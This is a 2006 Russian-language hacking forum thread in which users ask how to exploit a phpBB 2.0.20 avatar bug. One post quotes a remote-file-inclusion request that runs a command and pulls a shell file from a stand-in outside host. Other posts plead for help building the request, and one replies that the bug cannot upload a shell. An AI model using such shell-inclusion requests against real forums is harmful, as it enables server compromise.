Phpbb 2.0.20 баг с удалённой аваторой + вопрос

banado · 28 May 2006

http://www.securitylab.ru/vulnerability/source/267550.php тут полное описание бага (на англиском)

Вопрос:

http://some_vulnerable.host/somescript.php?cmd=ls -la&xpl=http://somehost/someshell.txt
Click to expand...

http://some_vulnerable.host - это форум phpBB
http://somehost/someshell.txt -это шел
somescript.php?cmd=ls%20-la&xpl= - что это?

banado · 28 May 2006

В чём разобрался сам:

(3) inject some php code inside jpeg files as EXIF metadata content:
this, in combinations with third party vulnerable code can be used
to compromise the server where PHP is installed.
Should be enough to check for php code inside the temporary files
before to copy the new avatar in "images/avatars/" folder
Click to expand...

Решение тут:
http://www.php.net/image
http://www.zend.com/manual/ref.exif.php
http://us2.php.net/exif

xdye · 28 May 2006

Слушай очень надо решить этот вапрос! помогим как созтавить!

ZaCo · 28 May 2006

никакого шелла вы с помощью этой баги не зальете. даже с моими скудными познаниями в английском языке это понятно.

banado · 28 May 2006

zoko
хорошо...тогда что даёт эта бага?
и как составить правильный запрос?

Phpbb 2.0.20 баг с удалённой аваторой + вопрос

banado New Member

banado New Member

xdye Elder - Старейшина

ZaCo Banned

banado New Member

Useful Searches

Phpbb 2.0.20 баг с удалённой аваторой + вопрос

banado New Member

banado New Member

xdye Elder - Старейшина

ZaCo Banned

banado New Member